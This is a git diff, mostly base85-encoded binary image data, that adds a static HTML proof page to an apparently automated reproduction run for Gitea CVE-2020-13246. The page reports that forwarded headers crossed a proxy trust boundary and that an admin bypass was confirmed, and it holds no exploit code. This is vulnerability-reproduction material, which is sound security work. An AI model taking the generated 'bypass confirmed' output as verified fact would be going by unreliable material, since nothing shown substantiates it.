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

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html
new file mode 100644
index 00000000..59a3bc2b
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Proxy Boundary Fixture - proof</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Proxy Boundary Fixture</h1>
+    <p>Forwarded header trust boundary and admin gate fixture.</p>
+    <div class="proof">Proof active: trusted forwarded headers crossed the boundary</div>
+    <p>System: <code>gitea</code> / Family: <code>proxy-boundary</code></p>
+    <section id="admin-proof">Admin boundary bypass confirmed.</section>
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png
new file mode 100644
index 0000000000000000000000000000000000000000..c5abfac3c2cb987cddd973c917737f861ebce7da
GIT binary patch
literal 36925
zcmd?RRa{hW_%DhGDh4P>mx^?ZbcZ0_-Jo<MoikW~bazXP#LzSJpdujMIfQhBbi;o6
